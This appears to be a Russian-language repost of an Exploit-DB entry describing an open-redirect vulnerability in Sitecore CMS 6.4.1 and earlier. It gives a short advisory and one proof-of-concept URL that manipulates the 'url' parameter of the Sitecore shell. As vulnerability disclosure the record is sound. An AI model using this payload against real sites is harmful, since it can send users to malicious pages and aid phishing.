- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 36001
- Проверка EDB
-
- Пройдено
- Автор
- TOM NEAVES
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- null
- Дата публикации
- 2011-07-28
Код:
source: https://www.securityfocus.com/bid/48930/info
Sitecore CMS is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
Successful exploits may redirect a user to a potentially malicious site; this may aid in phishing attacks.
Sitecore CMS versions 6.4.1 rev. 110324 and prior are vulnerable.
http://www.example.com/sitecore/shell/default.aspx?xmlcontrol=Application&url=http://www.example.com&ch=WindowChrome&ic=Applications%2f32x32%2fabout.png&he=About+Sitecore&ma=0&mi=0&re=0- Источник
- www.exploit-db.com
